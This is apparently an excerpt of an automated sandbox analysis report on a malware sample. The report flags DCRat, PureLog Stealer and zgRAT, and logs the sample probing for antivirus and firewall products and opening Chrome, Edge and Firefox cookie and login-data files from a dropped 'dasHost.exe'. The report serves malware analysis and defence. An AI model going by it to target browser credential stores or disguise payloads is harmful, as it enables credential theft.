                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F1DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00F1DF1E
                                    Source: C:\Users\user\Desktop\ZZ2sTsJFrt.exeCode function: 0_2_00F0B146 GetVersionExW,0_2_00F0B146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000004.00000002.1824772825.0000000012B05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HyperPortContainerproviderinto.exe PID: 3168, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: ZZ2sTsJFrt.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.HyperPortContainerproviderinto.exe.4f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1677180578.0000000005330000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1676672997.00000000069F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1686573197.00000000004F2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: ZZ2sTsJFrt.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.537e723.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.ZZ2sTsJFrt.exe.6a3e723.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.HyperPortContainerproviderinto.exe.4f0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Sidebar\Gadgets\AaHCyFZRuOMjGDqdgJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hyperServerBrowserhostmonitor\HyperPortContainerproviderinto.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exe, type: DROPPED
                                    Tries to harvest and steal browser information (history, passwords, etc)
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                                    Source: C:\Program Files (x86)\Common Files\Microsoft Shared\dasHost.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
